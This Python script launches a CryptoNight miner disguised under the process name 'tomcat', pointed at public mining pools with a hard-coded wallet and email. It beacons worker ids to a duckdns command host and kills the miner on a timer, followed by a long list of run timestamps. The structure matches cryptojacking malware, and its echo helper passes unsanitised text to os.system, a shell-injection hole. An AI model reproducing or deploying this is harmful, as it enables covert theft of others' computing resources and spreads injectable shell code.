import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:19:07.421634
#2018-02-17 16:07:03.738835
#2018-02-17 17:54:05.335496
#2018-02-17 19:41:06.350170
#2018-02-17 21:29:04.936983
#2018-02-17 23:13:06.199359
#2018-02-18 01:00:10.869372
#2018-02-18 02:49:03.728528
#2018-02-18 04:38:04.758173
#2018-02-18 06:29:07.883894
#2018-02-18 08:18:01.349359
#2018-02-18 10:06:04.293077
#2018-02-18 11:52:05.802283
#2018-02-18 13:37:07.204995
#2018-02-18 15:27:04.040713
#2018-02-18 17:16:03.763556
#2018-02-18 19:04:01.692747
#2018-02-18 20:50:08.112518
#2018-02-18 22:36:01.347628
#2018-02-19 00:24:04.855419
#2018-02-19 02:10:07.698043
#2018-02-19 03:56:04.794388
#2018-02-19 05:42:06.924274
#2018-02-19 07:30:04.666450
#2018-02-19 09:20:04.281179
#2018-02-19 11:09:05.407656
#2018-02-19 12:56:04.532093
#2018-02-19 14:45:03.090210
#2018-02-19 16:34:05.451238
#2018-02-19 18:21:05.574702
#2018-02-19 20:06:08.450176
#2018-02-19 21:56:02.196638
#2018-02-19 23:40:09.200583
#2018-02-20 01:27:06.746696
#2018-02-20 03:17:05.076264
#2018-02-20 05:05:06.370118
#2018-02-20 06:48:04.644923
#2018-02-20 08:35:07.600644
#2018-02-20 10:19:01.394256
#2018-02-20 12:04:05.032860
#2018-02-20 13:50:12.984150
#2018-02-20 15:36:09.099122
#2018-02-20 17:21:09.521650
#2018-02-20 19:10:11.908784
#2018-02-20 20:58:08.131478
#2018-02-20 22:44:09.498954
#2018-02-21 00:27:03.507490
#2018-02-21 02:14:07.801381
#2018-02-21 04:02:07.966736
#2018-02-21 05:49:04.452664
#2018-02-21 07:36:05.715033
#2018-02-21 09:21:07.260493
#2018-02-21 11:11:08.379195
#2018-02-21 12:59:08.989566
#2018-02-21 14:46:07.307099
#2018-02-21 16:34:06.593124
#2018-02-21 18:23:10.753765
#2018-02-21 20:09:04.129074
#2018-02-21 21:56:01.486737
#2018-02-21 23:41:06.725087
#2018-02-22 01:30:01.605949
#2018-02-22 03:18:05.639562
#2018-02-22 05:06:01.497137
#2018-02-22 06:49:05.408654
#2018-02-22 08:37:04.443380
#2018-02-22 10:24:08.012119
#2018-02-22 12:09:04.765485
#2018-02-22 13:54:04.651475
#2018-02-22 15:41:07.546283
#2018-02-22 17:28:01.289189
#2018-02-22 19:15:03.964476
#2018-02-22 21:08:03.914913
#2018-02-22 22:53:02.224577
#2018-02-23 00:39:05.379893
#2018-02-23 02:27:04.940492
#2018-02-23 04:17:01.739269
#2018-02-23 06:03:01.483467
#2018-02-23 07:48:02.031041
#2018-02-23 09:52:07.445202
#2018-02-23 11:57:08.411204
#2018-02-23 13:46:05.908035
#2018-02-23 15:34:06.544463
#2018-02-23 17:24:07.544834
#2018-02-23 19:10:10.936856
#2018-02-23 20:56:05.500909
#2018-02-23 23:02:04.302184
#2018-02-24 00:48:05.566610
#2018-02-24 02:38:07.047378
#2018-02-24 04:32:07.873183
#2018-02-24 06:17:02.031876
#2018-02-24 08:05:05.562326
#2018-02-24 09:49:05.087611
#2018-02-24 11:44:06.413023
#2018-02-24 13:34:07.628281
#2018-02-24 15:22:03.789040
#2018-02-24 17:11:06.696839
#2018-02-24 19:03:03.414320
#2018-02-24 20:51:07.252041
#2018-02-24 23:10:05.507641
#2018-02-25 03:22:03.329220
#2018-02-25 06:04:06.683088
#2018-02-25 11:38:05.650462